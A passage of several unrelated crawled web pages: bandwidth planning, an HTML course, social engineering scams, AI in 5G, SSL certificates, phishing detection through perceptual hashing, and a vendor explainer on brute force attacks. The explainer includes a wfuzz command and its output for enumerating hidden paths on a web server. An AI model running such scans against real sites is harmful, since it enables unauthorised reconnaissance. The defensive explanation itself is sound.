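    # Load a PEM-encoded certificate from disk.
    with open(pem_path, "rb") as f:
        cert = x509.load_pem_x509_certificate(f.read())
    # In a self signed certificate the issuer and the subject are the same
    # entity; no third-party CA is vouching for the publisher.
    return cert.issuer == cert.subject

print(is_self_signed("codesign.pem"))  # "codesign.pem" is a placeholder path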
<urn:uuid:3853a952-f3a6-4832-9b22-3add322a46b8>
CC-MAIN-2022-40
https://codesigningstore.com/how-to-generate-self-signed-code-signing-certificate
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00421.warc.gz
en
0.925209
1,723
2.703125
3
The Internet has expanded people’s ability to do business, and in doing so it has spurred a series of innovations that have effectively changed the world. With today’s businesses almost assuredly spending on at least one cloud-based solution, and with mobility making its way into almost every business in one form or another, the demand for more bandwidth is something most businesses are wrangling with. Today, we’ll describe what having enough bandwidth means.
Bandwidth is one of those terms that you think you understand until you try to explain it to someone else. In simple terms, bandwidth is how fast data can be transferred through a medium. In the case of the Internet, millions of bits need to be transferred from the web to network-attached devices every second. The more bandwidth you have access to, the more data can be transferred.
Speed vs Throughput
Network speed–that is, how fast you are able to send and receive data–is typically a combination of available bandwidth and a measure called latency. The higher a network’s latency, the slower the network is going to be, even on high-bandwidth network connections. Latency can come from many parts of the network connection: slow hardware, inefficient data packing, wireless connections, and others.
Throughput is the measure of the amount of data that is actually transmitted through a connection. Also called payload rate, this is the effective ability of the connection to deliver data. So, while bandwidth is the presumed amount of data any connection can transfer, throughput is the amount of data that actually is transferred through the connection. The disparity between the two can come from several places, but typically the latency of the transmitting sources results in throughput being quite a bit less than the bandwidth.
What Do You Need Bandwidth For?
The best way to answer this is to first consider how much data your business sends and receives. How many devices are transferring data? Is it just text files? Are there graphics and videos? Do you stream media? Do you host your website? Do you use any cloud-based platforms? Do you use video conferencing or any other hosted communications platform? All of these questions (and a few not mentioned) have to be asked so that your business can operate as intended.
First, you need to calculate how many devices will connect to your network at the same time. Next, you need to consider the services that are being used. These can include, but are not limited to:
- Data backup
- Cloud services
- File sharing
- Online browsing
- Social media
- Streaming audio
- Streaming video
- Interactive webinars
- Uploads (files, images, video)
- Video conferencing
- Voice over Internet Protocol (VoIP)
- Wi-Fi demands
After considering all the uses, you then need to take a hard look at how much bandwidth each of those tasks requires. Obviously, if you lean on your VoIP system, or you are constantly doing video webinars, you will need to factor those operational decisions into your bandwidth decision making. Finally, once you’ve pinpointed all the devices and tasks, the bandwidth each task takes, and how many people on your network perform these tasks, you total up the traffic estimate. Can you make a realistic estimate with this information? Depending on your business’ size and network traffic, you may not be able to get a workable figure.
Too Much or Not Enough
Paying for too little bandwidth is a major problem, but so is paying for too much.
Bandwidth, while more affordable than ever before, is still pretty expensive, and if you pay for too much bandwidth, you are wasting capital that you can never get back. That’s where the professionals come in. ExcalTech has knowledgeable technicians who can assess your bandwidth usage and work with your ISP to get you the right amount for your business’ usage. If you would like more information about bandwidth, its role in your business, or how to get the right amount for your needs, call us today at (877) 638-5464.
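To make the totalling step described above concrete, here is a small sketch of that arithmetic. The per-task figures, the office profile, and the 30% headroom factor are illustrative assumptions rather than measurements; an assessment of your actual usage would substitute real numbers.

# Rough bandwidth estimate: per-task requirements in Mbps multiplied by the
# number of people expected to use each service at the same time.
PER_USER_MBPS = {
    "voip_call": 0.1,
    "hd_video_conference": 3.0,
    "cloud_file_sync": 2.0,
    "web_browsing": 1.0,
    "hd_video_stream": 5.0,
}

def estimate_mbps(concurrent_users, headroom=1.3):
    # Sum each service's load, then add headroom for bursts and growth.
    total = sum(PER_USER_MBPS[task] * count for task, count in concurrent_users.items())
    return total * headroom

office = {"voip_call": 10, "hd_video_conference": 4, "cloud_file_sync": 15, "web_browsing": 25}
print(f"Estimated requirement: {estimate_mbps(office):.0f} Mbps")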
<urn:uuid:d4187c1b-ed76-4169-ba9b-b32903ed8ef0>
CC-MAIN-2022-40
https://www.excaltech.com/taking-a-long-look-at-your-companys-bandwidth-needs/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00421.warc.gz
en
0.946627
856
2.953125
3
HTML 4.0 Programming: Level 1 (Multi-platform)
Course number: 075 906
Software version number: 4.0
Course length: 1 day
Hardware/software required to run this course
In order to run this course, you will need: See your reference manual for hardware considerations that apply to your specific hardware setup.
Overview: Students will learn HTML code.
Prerequisites: Windows 95 or greater, using the Internet, experience with Netscape or Microsoft browsers, or equivalent knowledge.
Delivery method: Instructor-led, group-paced, classroom-delivery learning model with structured hands-on activities.
Benefits: Students will learn how to create Web pages using HTML code.
Target student: Students enrolling in this course should understand how to use Windows 95 or greater as well as a browser for the Internet.
What's next: HTML 4.0 Programming: Level 1 is the first course in this series. HTML 4.0 Programming: Level 2, the next course in this series, teaches students how to create more advanced Web pages.
Lesson objectives help students become comfortable with the course, and also provide a means to evaluate learning. Upon successful completion of this course, students will be able to:
Lesson 1: Overview of HTML
Lesson 2: Formatting text with HTML
Lesson 3: Adding local and remote links
Lesson 4: Adding graphics and sound
Lesson 5: Creating lists in HTML
Lesson 6: Creating tables in HTML
Lesson 7: Setting body and background attributes
Lesson 8: Web page design guidelines
Lesson 9: Adding links to other Internet services
Days Of Training: 1.0
Product Type: Print Courseware
Publication Date: 1998-08-13 00:00:00
Secondary Category: Web Design
<urn:uuid:b6692c8e-d05c-4226-8ab3-2ebad7acc6ef>
CC-MAIN-2022-40
https://store.emtmeta.com/quickview/product/quickview/id/7076/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337473.26/warc/CC-MAIN-20221004023206-20221004053206-00421.warc.gz
en
0.762767
451
2.953125
3
Defines a multi-dimensional database. A Mondrian schema contains a logical model, consisting of cubes, hierarchies, and members, and a mapping of this model onto a physical model. The logical model consists of the constructs used to write queries in the MDX language: cubes, dimensions, hierarchies, levels, and members. The physical model is the source of the data presented through the logical model. It is typically a star schema, which is a set of tables in a relational database.
<urn:uuid:111c04bc-a6c9-4f70-b13c-af0bb2311bb0>
CC-MAIN-2022-40
https://help.hitachivantara.com/Documentation/Pentaho/6.0/0N0/010/070/040
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00421.warc.gz
en
0.908499
100
2.921875
3
Social engineering - the main tactic used by hackers to carry out a cyber-crime
Ring ring: that noise and a quick conversation can cost organizations a million dollars. How is that possible? Say hello to social engineering attacks. Hackers use social engineering tactics to target people and take advantage of their carelessness or faulty behavior. They play on people's emotions and feelings to access data that can cost the firm a fortune. The main goal behind a social engineering cybercrime is to gain victims' trust and persuade them to share valuable information.
So, what can firms do to protect themselves against cyber-crimes? One way is to educate employees by giving them cyber security training through online cyber security training courses. But that's just the tip of the iceberg. There are other preventive methods at the firm's disposal. But, before we talk about them, let's understand the mechanism behind a social engineering attack through real-life examples.
What are the Dynamics of a Social Engineering Attack?
Social engineering is the art of manipulating people into revealing sensitive data. The type of information hackers are after varies, but most cybercriminals look for passwords, bank information, or access to computers where they can install malicious code. Social engineering is one of the easiest forms of cyber-attack to carry out, which is why it is so prevalent in the IT industry. Humans are the weakest link in the security chain, and we can say the most common threat always comes from within. That is why firms need to impart cyber security training to employees through top-rated online courses where they will learn from real-life examples.
Types of Social Engineering Attacks That are Making Rounds in The Market
Pharming: In this cyber-crime, the hacker redirects users from the real website to a fake one to steal passwords or acquire other sensitive information. To do this, hackers manipulate browser settings or run malicious code in the background.
Phishing: In this attack, hackers pose as an IT help desk agent or accountant, mimic your brand's look, and purchase a domain that resembles the real website. They then present a password reset page that looks like the legitimate one to capture credentials and gain entry into the account. Hackers use this information to access the network and move deeper into it.
Vendor Scams for API Keys: Here, hackers target the API key for a specific product. They find tracking codes on your website, pose as a member of the vendor organization, and message you with what looks like a standard automated email asking you to reset your API key by following a link. The link leads to a phishing website that asks for the key. Once they have that key information, they can use it to do anything on your behalf.
Scareware: In this scam, hackers frighten people by telling them a virus has infected their computer. Next, they push the victim to buy what is presented as real cyber security software but is actually malware.
If you want protection from social engineering attacks, ask your employees to work on real-time cyber security projects. The real projects will help them protect their systems in the real world.
Real-Life Examples of Cyber Security Social Engineering Attacks
Shark Tank Attack of 2020
The television judge Barbara Corcoran experienced a social engineering attack costing nearly USD 400,000 in 2020. In this attack, a cybercriminal acted as her assistant and sent an email to a bookkeeper requesting the renewal of a payment.
But, the attack was identified beforehand when the bookkeeper sent an email to the correct address asking about the transaction.
The auto parts supplier Toyota Boshoku Corporation came under a social engineering attack that cost it USD 37 million.
Sony Pictures, 2014
In this social engineering attack, thousands of files were stolen, including business agreements, financial documents, and employee information.
Cabarrus County, 2018
Due to a social engineering and BEC scam, Cabarrus County in the USA experienced a loss of USD 1.7 million.
FACC, $60 Million Loss
The aerospace parts manufacturer FACC lost about $60 million in a CEO fraud scam. In this scam, fraudsters impersonated a high-level executive to trick employees into transferring funds.
How to Prevent a Social Engineering Attack? A Complete Guide!!
Don't want to be a victim? Trust us; it's not rocket science to protect yourself from social engineering attacks. You need the right cyber security project tutorial, where employees will learn tips to protect their systems from potential threats. Other preventive measures include:
Don't Accept any Help from Unknown Sources Online
Trust us; legitimate firms will not contact you for help; you have to contact them instead. Any request for help, like resetting passwords or restoring credit scores, can be a scam. Likewise, delete it if you receive a request for help from a charity that you don't know.
Make use of Spam Filters
In your email program, you will find spam filters. Set them to high, and check the spam folder to make sure no important email lands there. You can follow a step-by-step guide for setting spam filters by searching for your email provider's name.
Always Secure your Computing Device
To protect your system from cyber-attack, install anti-virus software, firewalls, and email filters to ensure your security is top-notch. Select the automatic update setting for your operating system, and update it manually whenever the automatic update fails and you receive a notification about it.
Now that you know the different types of social engineering attacks, are you all set to protect your system from one? Don't know where to start? Fret not! School.infosec4tc has in store for you the best cyber security training course that will help your employees learn about the latest cyber security attacks and how to protect the system from such attacks.
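One small, automatable control that complements the training described above is flagging sender domains that look confusingly similar to domains the firm actually deals with, since lookalike domains appear in several of the scams listed. The sketch below is only an illustration: the trusted domains, the threshold, and the example addresses are made-up assumptions, and it uses only Python's standard library.

from difflib import SequenceMatcher

# Domains the organization legitimately deals with (illustrative).
TRUSTED_DOMAINS = {"example.com", "examplebank.com"}

def lookalike_score(domain):
    # Highest similarity between the sender's domain and any trusted domain.
    return max(SequenceMatcher(None, domain, trusted).ratio() for trusted in TRUSTED_DOMAINS)

def is_suspicious(sender_address, threshold=0.85):
    domain = sender_address.rsplit("@", 1)[-1].lower()
    if domain in TRUSTED_DOMAINS:
        return False
    # Very similar but not identical usually means a spoofed lookalike.
    return lookalike_score(domain) >= threshold

print(is_suspicious("billing@examp1e.com"))   # True  - lookalike of example.com
print(is_suspicious("billing@example.com"))   # False - exact trusted domain
print(is_suspicious("news@unrelated.org"))    # False - not similar enough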
<urn:uuid:02ea4942-4c03-420f-a7ea-3e11690a490b>
CC-MAIN-2022-40
https://www.infosec4tc.com/2022/05/31/social-engineering-attack-how-to-protect-yourself-and-real-life-examples/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00421.warc.gz
en
0.920467
1,242
3.015625
3
Artificial intelligence (AI) is the simulation of human intelligence processes by machines, usually computer systems. AI programs focus on three main cognitive skills: learning (acquiring data and creating rules for sorting that data), reasoning (choosing the right data to achieve the desired outcome), and self-correction (fine-tuning the data sorting for the most accurate results). The data sorting rules are known as algorithms, which offer step-by-step instructions for how to achieve an outcome. All US cellular carriers have now launched some form of 5G. What is 5G? 5G simply stands for fifth-generation cellular wireless. Its standards were first set in late 2017. There are three basic types of 5G service: low-band, mid-band, and high-band. They’re all incompatible right now, and they all perform differently. Even though all the US carriers “have” 5G right now, it will be another couple of years before we see significant changes from it. By comparison, 4G first rolled out in 2010, and it was 2012/2013 before major apps that required 4G to work became popular. However, Ericsson, a leading provider of Information and Communication Technology (ICT) for service providers, estimates that by 2024, 40% of the world will be connected by 5G. The “G” in 5G simply stands for “generation.” 1G was analog cellular service. 2G technologies were the first generation of digital cellular technologies. 3G technologies improved speeds from 200kbps to several megabits per second. 4G technologies are currently offering hundreds of Mbps and even up to gigabit-level speeds. 5G offers several new aspects: bigger channels to offer faster speeds, lower latency for higher responsiveness, and the ability to connect more devices at once. Image Source: Towards Data Science There are many complexities inherent in adopting 5G networks, and one way the industry is addressing those complexities is by integrating artificial intelligence into networks. When Ericsson surveyed decision-makers from 132 worldwide cellular companies, over 50% said they expected to integrate AI into their 5G networks by the end of 2020. The primary focus of AI integration is reducing capital expenditures, optimizing network performance, and building new revenue streams. 55% of decision-makers stated that AI is already being used to improve customer service and enhance customer experience by improving network quality and offering personalized services. 70% believe that using AI in network planning is the best method for recouping the investments made on switching networks to 5G. 64% of survey respondents will focus their AI efforts on network performance management. Other areas where cellular decision-makers intend to focus AI investments include managing SLAs, product life cycles, networks, and revenue. There are challenges associated with integrating AI into 5G networks, of course. Effective mechanisms for collecting, structuring, and analyzing the enormous volumes of data amassed by AI must be developed. For that reason, early AI adopters who find solutions to these challenges will emerge as the clear frontrunners as 5G networks become connected. While our smartphones have gotten increasingly smaller, the core algorithms that run them have not evolved since the 1990s. Therefore, 5G systems consume far more power than desired and achieve lower data rates than expected. Replacing traditional wireless algorithms with deep learning AI will dramatically reduce power consumption and improve performance. 
This approach will be fundamentally more significant than focusing AI primarily on network management and scheduling. Further, the bandwidth used by current cellular networks operates on the radio spectrum. The electromagnetic waves in the frequency range of the radio spectrum are called radio waves. Radio waves are widely used in telecommunication, along with numerous other modern technologies. National laws strictly regulate interference between users of different radio waves, and the International Telecommunication Union (ITU) oversees the coordination of these laws. There is concern that the growing use of wireless technologies will overcrowd the airwaves our devices use to communicate with one another. One proposed method for resolving this issue is to develop communication devices that don't broadcast on the same frequency every time. AI algorithms would then be used to find available frequencies by enabling intelligent awareness of RF activity that was not previously feasible. While 5G is up to 20 times faster than 4G, it offers more than just faster speeds. Due to its low latency, 5G will allow developers to create applications that take full advantage of improved response times, including near real-time video transmission for sporting events or security purposes. Additionally, 5G connectivity will allow more access to real-time data from various solutions. 5G leverages Internet of Things (IoT) sensors that last for years, requiring far less power for operation. This could allow remote detection of farming irrigation levels and equipment condition changes in factories. Doctors could securely access patient data more easily. All these opportunities will require the use of AI to make them functional. Edge computing is the concept of processing and analyzing data in servers closer to the applications they serve. While it is growing in popularity and opening new markets for telecom providers, among other industries, many have argued that introducing “connected” products, such as coffee cups and pill dispensers, did not cause the market to spike as expected. Recent AI technology advancements, however, have begun to revolutionize industries and the amount of value all this connectivity can provide to consumers by combining big data, IoT, and AI. 5G accelerates this revolution because the 5G network architecture easily supports AI processing. The 5G network architecture will change the future of artificial intelligence. 5G will enhance the speed and integration of other technologies, while AI will allow machines and systems to function with intelligence levels similar to those of humans. In a nutshell, 5G speeds up the services on the cloud while AI analyzes and learns from the same data faster. Simply put, machine learning (ML) is a subset of AI that creates algorithms and statistical models to perform a specific task without using explicit instructions, relying instead on patterns and inference. ML algorithms build mathematical models based on sample data, called training data, to make predictions or decisions without being programmed specifically for that task. Learned signal processing algorithms can empower the next generation of wireless systems with significant reductions in power consumption and improvements in density, throughput, and accuracy when compared to the brittle and manually designed systems of today. Deep learning is a subset of machine learning in which the algorithms used have many levels that each provide a different interpretation of the data.
The subsequent network of algorithms is known as artificial neural networks because it resembles the neural networks of the human brain. Neural networks that learn how to communicate effectively, even under harsh impairments, are fast becoming a reality. A fully operative and efficient 5G network cannot be complete without AI. ML and AI integration into the network edge can be achieved through the use of 5G networks. 5G enables simultaneous connections to multiple IoT devices, generating massive amounts of data that must be processed using ML and AI. When ML and AI are integrated with 5G multi-access edge computing (MEC), wireless providers can offer: Existing 4G networks use Internet Protocol (IP) broadband connectivity to transmit, which offers poor efficiency. ML and AI allow 5G networks to be predictive and proactive, which is essential for 5G networks to become functional. By integrating ML into 5G technology, intelligent base stations will be able to make decisions for themselves, and mobile devices will be able to create dynamically adaptable clusters based on learned data. This will improve the efficiency, latency, and reliability of network applications. As the 5G network becomes increasingly complex and novel uses such as autonomous cars, industrial automation, virtual reality, e-health, and others emerge, ML will become essential in making the 5G vision a reality. As with any new technology, there are both significant potentials to be achieved and limitations to be overcome. Potentials of ML for 5G communications include: Limitations of ML for 5G communications include: With all this potential for using ML and AI to integrate with 5G networks, industries are already working toward innovating with 5G. Some of the top innovations on the horizon include:
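To give a concrete flavor of the spectrum-awareness idea mentioned earlier, here is a toy, non-learned baseline: an energy detector that flags frequency bins whose measured power sits well above an estimated noise floor. It is not taken from the article, the numbers are synthetic, and learned (deep learning) detectors aim to outperform exactly this kind of hand-tuned rule. It assumes NumPy is available.

import numpy as np

def occupied_bins(power_db, margin_db=6.0):
    # Use the median as a crude, robust estimate of the noise floor and
    # flag any bin that rises more than margin_db above it.
    noise_floor = np.median(power_db)
    return np.flatnonzero(power_db > noise_floor + margin_db)

rng = np.random.default_rng(0)
spectrum = rng.normal(-100.0, 1.0, 64)   # 64 bins of receiver noise, in dBm
spectrum[[5, 23, 40]] += 20.0            # three synthetic active transmitters
print("Busy bins:", occupied_bins(spectrum))  # the remaining bins could be reused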
<urn:uuid:8891190d-0188-43c9-a934-21b6c03ab408>
CC-MAIN-2022-40
https://www.deepsig.ai/how-artificial-intelligence-improves-5g-wireless-capabilities
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333541.98/warc/CC-MAIN-20220924213650-20220925003650-00621.warc.gz
en
0.943309
1,663
3.078125
3
A brute force attack is a technique used to discover an unknown value by systematically trying every possible combination until access to the targeted resource is gained. In the context of web applications, such attacks appear as a volley of HTTP requests that successively cycle through a user input value till the "right" value is hit. This value could be a GET or POST parameter, usernames and passwords, URL paths or header values. Such attacks are carried out using automated tools and scripts that try every possible character combination to discover the value that is sought.
Attackers often make use of the fact that invalid inputs to web applications yield a different page than valid values. For example, an invalid username could yield one error message, an invalid password could yield another, and a successful login yields a totally different page. An attacker can then write a script that cycles through username values and watches the error message. When the error changes from "invalid user" to "invalid password", the attacker has identified a valid username and can then proceed to cycle through passwords for that valid username until the correct password is hit. The other weakness that facilitates this attack is the lack of a policy to enforce a maximum attempt count for accessing a particular resource.
In addition to targeting login credentials, a brute force attack could also be used for guessing hidden pages or content, session ID values, one time passcodes, credit card numbers, and even reversing cryptographic hash functions. Because brute force attacks from a single client could be easy to spot and block, attackers frequently use multiple attack sources that try to attack the web application in concert. Therefore, a common by-product of brute force attacks is resource exhaustion on the server, which could degrade the quality of service to genuine clients.
Indications of a Brute Force Attack
Since brute force attacks require trial and error of a large set of values, the most common indicator is an unusual volume of failed requests. When a parameter is being attacked (like username) then the requests are all to the same page. If the attacker is trying to find hidden pages, then each request would be different but the server response codes will be 404: Page Not Found.
A successful brute force attack can result in the following:
- It can leak confidential and private data (for example: user's profile data, bank details, financial status).
- It can leak hidden files or interfaces (for example: admin interface).
- It can disrupt the service if the service is attacked to the point of causing a denial of service (DoS).
If the attackers succeed in gaining access to administrative panels, they can modify/delete/add web application content, modify user privileges, and more.
Example: Brute Force Attack to Identify a URL in a Web Application
The attacker uses a word list of known pages to execute a brute force attack on a web application. In the example below, the attacker tries a brute force attack on a popular content management system. The attacker sends a request to each known page and then analyzes the HTTP response code to determine if the requested page exists on the target server.
[root@localhost wfuzz-2.1-beta]# python wfuzz.py -c -z file,wordlist/general/common.txt --hc 404 http://X.X.X.X/FUZZ
* Wfuzz 2.1 - The Web Bruteforcer *
Total requests: 950
ID      Response   Lines   Word    Chars       Request
00213:  C=200      2 L     1 W     8 Ch        "default"
00457:  C=301      7 L     20 W    239 Ch      "lost%2Bfound"
00472:  C=301      7 L     20 W    235 Ch      "manual"
00584:  C=301      7 L     20 W    235 Ch      "portal"
00759:  C=200      828 L   2150 W  1275626 Ch  "script"
00783:  C=301      7 L     20 W    233 Ch      "test"
Total time: 19.71608
Processed Requests: 950
Filtered Requests: 944
How to Limit Attacks
Brute force attacks are difficult to stop completely, but with proper countermeasures and a carefully designed website, it is possible to limit these attacks. Use the following measures on your login pages to defend against brute-force attacks:
- Enforce long and secure passwords.
- Limit the number of failed login attempts and block users who attempt to log in using different passwords within a short period of time. Note that this could potentially end up blocking genuine users, if attackers use their usernames too many times in failed login attempts.
- Challenge suspicious requests with CAPTCHA or other challenges to prevent automated attacks.
The Barracuda Web Application Firewall allows you to restrict the maximum attempts to access resources in a given time window. The counting can be done per source IP or across all sources. When clients violate the access policy, they can be either presented with a CAPTCHA to prove they are humans and not scripts or locked out for a time period you specify.
OWASP Top 10, PCI-DSS
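As a rough sketch of the "limit failed attempts" countermeasure above (not taken from any vendor's implementation), the snippet below counts recent failures per source IP inside a sliding time window and reports when a source should be challenged or locked out. The window size, threshold, and example addresses are illustrative assumptions, and a production system would persist this state outside process memory.

import time
from collections import defaultdict, deque

WINDOW_SECONDS = 300   # look-back window for counting failures
MAX_FAILURES = 5       # failures allowed inside the window

_failures = defaultdict(deque)   # source IP -> timestamps of failed logins

def record_failure(ip, now=None):
    _failures[ip].append(time.time() if now is None else now)

def is_locked_out(ip, now=None):
    now = time.time() if now is None else now
    attempts = _failures[ip]
    while attempts and now - attempts[0] > WINDOW_SECONDS:
        attempts.popleft()               # drop entries older than the window
    return len(attempts) >= MAX_FAILURES

for _ in range(6):
    record_failure("203.0.113.7")
print(is_locked_out("203.0.113.7"))      # True -> present a CAPTCHA or block
print(is_locked_out("198.51.100.20"))    # False -> no recent failures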
<urn:uuid:13936b25-71a2-4f55-991a-019707f5d9cd>
CC-MAIN-2022-40
https://campus.barracuda.com/product/webapplicationfirewall/doc/42049329/brute-force-attack
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334802.16/warc/CC-MAIN-20220926051040-20220926081040-00621.warc.gz
en
0.811819
1,102
3.625
4
Google takes web security standards very seriously and is looking to make the Internet a “safe place”. Accordingly, it offered a slight boost in ranking for SSL and HTTPS secured websites. However, things changed in 2017, when Google announced that its search engine algorithm would begin penalizing sites without SSL certificates.
SSL is an acronym for Secure Sockets Layer – a standardized protocol that enables private and confidential sessions between two applications exchanging data over a TCP/IP connection. To put it simply, it’s a small data file that, once installed on your server, allows sensitive data such as credit card information, social security numbers and login credentials to be exchanged safely. When an SSL certificate is deployed it activates the HTTPS protocol on your website. When a site is secured and certified, a green padlock and HTTPS appear just to the left of the address bar in browsers (just like in the image below). If you are looking for more technical details about SSL Certificates you can find them in our knowledge base.
Why do I need an SSL Certificate?
In recent years, privacy and security became the most critical issues in the world of online business. If your customers don’t feel safe there’s no customer trust, and without customer trust a web based business just won’t do well. It’s even safe to say that the lack of security and privacy standards will most likely ruin an online endeavor. When your website is handling personal data, whether it’s through simple login forms, handling transactions or credit card data, security should be a top priority. It’s in this context that SSL Certificates join the game.
Data transmitted between browsers and web servers is sent in the form of plain text, which makes it pretty vulnerable to eavesdropping. A hacker will easily grab and misuse intercepted information. With an SSL in place, a hacker will be unable to read that intercepted data. Also, statistically speaking, 70% of online shoppers cancel online orders if they don’t trust or feel comfortable executing the transaction.
The main benefits of using SSLs:
- Security – This one is quite self-explanatory. Hackers won’t be able to capture data exchanged through your site. SSL blocks interception or “man-in-the-middle” attacks. Even if you don’t handle sensitive data, an SSL certificate for your website is always a good idea.
- Trust – Reasons for getting an SSL go a bit beyond simple security. It shows your visitors and customers that you are ready to go the extra mile to make sure they get the best possible experience – a key factor in building trustworthiness.
- Rankings – Google’s search algorithm treats security as a ranking factor. They are actually pushing towards what they call “HTTPS everywhere” and clearly stated that sites that show an SSL are going to be treated better in terms of rankings.
However, Google started to push harder in terms of website security, which makes it even more critical to deploy an SSL. Next, we’ll cover why now is the right time to get one.
Why do I Need it Now?
Not so long ago, HTTPS and SSL were heavy in terms of web performance and could ultimately end up slowing your site. However, this is not the case anymore, as HTTPS technology has progressed and the impact of SSLs on performance has become minimal or non-existent. With SSLs no longer being heavy and obstructing website performance, Google is shifting from boosting secured sites to actually penalizing those that aren’t.
It’s a big step towards achieving their goal of a completely “safe Internet”. If you’re looking to keep up with Google’s best practices, it’s time to get your website an SSL certificate.
There are many types of SSL certificates, so it can be hard to decide which one best covers your needs. Here are the top 3 most important you should focus on:
- Private certificates – Customers purchase their own single SSL certificate and have a dedicated IP address on each server for the domain the certificate was purchased for.
- Wildcard certificates – Enable SSL encryption on unlimited sub-domains with a single certificate, as long as the domains share the same name and are owned by the same organization.
- Multi-domain certificates – Enable securing up to a couple of hundred domains on the same server with a single certificate. It’s the best solution for businesses that host multiple unique domains on a single server, as it saves money while enabling a high standard of security and trust.
Once you get your SSL certificate you might want to display it. Certificates usually come with a trust seal or badge that you can put somewhere on your website or Facebook Application page to emphasize how much you care about your users’ online security.
We hope this article helped you understand the reasons why you should implement an SSL certificate along your online assets. Considering that the performance of a website (page load time) and the level of security it provides are becoming increasingly important as SEO factors, you might want to consider wrapping your website with a CDN to make it faster. Even though SSLs are not as heavy in terms of web performance as they used to be, an SSL session still requires multiple round trip communications between a client and server. With a CDN in place, this exchange always happens closer to the end user, minimizing delay and providing fast, consistent and secure performance worldwide. That way, besides showing your users that you are ready to go the extra mile, you can also protect your site from increasingly dangerous DDoS attacks, as CDNs can easily absorb them. They often provide their own free and easy-to-deploy SSL certificates. Also, if you already have an SSL it is easy to integrate it with a CDN solution.
To sum up, we strongly advise you to seriously evaluate your website performance and security standards as today they are more critical than ever before in terms of online reputation and trustworthiness. Want your customers to trust your website? Treat it with an SSL certificate; you won’t regret it, and Google will love you more.
If you have any further questions regarding the topic or need help choosing and deploying the right security and performance solutions for your website, feel free to contact our experts at GlobalDots.
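If you want to see roughly what a browser checks for, the short standard-library sketch below connects to a host over TLS, lets Python verify the certificate chain against trusted CAs, and prints who issued the certificate and when it expires. It is illustrative rather than part of the original article, and the hostname is a placeholder.

import socket
import ssl

def certificate_summary(host, port=443):
    # create_default_context() verifies the chain against trusted root CAs,
    # which is exactly the check that fails for self signed or missing certificates.
    context = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=5) as sock:
        with context.wrap_socket(sock, server_hostname=host) as tls:
            cert = tls.getpeercert()
    return {
        "subject": dict(item[0] for item in cert["subject"]),
        "issuer": dict(item[0] for item in cert["issuer"]),
        "expires": cert["notAfter"],
    }

print(certificate_summary("www.example.com"))  # placeholder hostname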
<urn:uuid:7b5c756c-2b04-486a-b0b3-776fa8688b60>
CC-MAIN-2022-40
https://www.globaldots.com/resources/blog/why-you-need-ssl-and-why-you-need-it-now-google-will-love-you-more/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335034.61/warc/CC-MAIN-20220927131111-20220927161111-00621.warc.gz
en
0.943176
1,293
2.796875
3
The Ultimate Guide to Big Data
Exploding information quantities led to the emergence of the term ‘Big Data’ for datasets which can’t be handled by common database and data processing tools. It literally means what it says, but beyond Volume, there are additional characteristics commonly associated with Big Data. These include Velocity – the rate at which the data is generated (and therefore changes) is rapid; and Variety/Variability – multiple data types render standard tools incapable of handling it. Generally, Big Data refers to datasets measured in terabytes, petabytes, or greater. The term can refer to the datasets themselves, as well as techniques for analysis and visualisation.
<urn:uuid:67f342c0-15de-430d-8d6d-b3404a572737>
CC-MAIN-2022-40
https://securitybrief.asia/tag/big-data
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00621.warc.gz
en
0.933117
134
3.125
3
Peck began with a general discussion of phishing and its relative importance in the web app security space today. He pointed out that while phishing is old news, and isn't the latest and greatest threat to hit the headlines, it is still out there and still causes damage. He put up some stats that show that phishing is alive and well (especially targeting Indian firms, apparently), but only constitutes about 1% of the overall amount of cybercrime. And while the overall amount may have grown with time, there is a question of "diminishing returns" based on the amount of effort required to combat an issue of comparatively lesser impact. It is unsurprising then that phishing detection remains largely unchanged since 2006: built on anti-spam technology (not all spam is phishing), sender blacklists, and site reputation. But changes in the environment have made these older techniques less and less effective. For example, user mobility makes perimeter defenses impossible (e.g. IPS). Also, with the large turnover in domain names and the ease of setting up new ones based on the new top-level domains, blacklists and reputation are hard to keep up to date. And the new vector of social media is almost impossible to police. To move forward with newer defenses, it is important to understand what makes phishing effective: the human factor. In Peck's terms: humans are gullible, greedy, careless, and uninformed. To counter this problem, we should try to get the computer to see things the way we humans see things. One way to do this involves the use of perceptual hashing. Perceptual hashing involves making a hash or "fingerprint" of images. Peck briefly overviewed three hashes: the average hash, the discrete cosine transform hash (uses methods similar to lossy compression to focus on salient detail), and the difference hash (very fast). Comparison of hashes of two images (made with the same algorithm) uses the Hamming distance, which is the count of bits that differ between two hashes. Phishing detection can utilize these hashes. A library of perceptual hashes of web pages is compiled with associated known good originators. Pages can also be broken down into discrete images that can be similarly hashed and cataloged. Then, when web pages or emails are encountered, those are hashed in the same way. If the hashes match or come close to those in the database, but the sender is different, a likely phishing attempt is flagged. Although I don't think Peck described it as such, this is effectively a whitelist approach, making it much more maintainable than a list of constantly changing phishing sites. I wonder how perceptual hashing could be used by NTOSpider, NTOBJECTives' web application vulnerability scanner. Perhaps current malware detection could be added as a feature. Of course, this would require either NTO maintaining its own list of hashes, or use of another database.
For a Barracuda Labs site that uses perceptual hashing, see http://www.threatglass.com/
For some perceptual hashing code: http://www.phash.org/
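To make the difference hash concrete, here is a minimal sketch of the idea (not Peck's code): shrink the image, compare each pixel to its right-hand neighbour to build a 64-bit fingerprint, and compare fingerprints with the Hamming distance. It assumes the Pillow imaging library is installed; the file names and the distance threshold are placeholders.

from PIL import Image

def dhash(path, size=8):
    # Grayscale, then resize to (size+1) x size so each row yields `size` comparisons.
    img = Image.open(path).convert("L").resize((size + 1, size))
    pixels = list(img.getdata())
    bits = 0
    for row in range(size):
        for col in range(size):
            left = pixels[row * (size + 1) + col]
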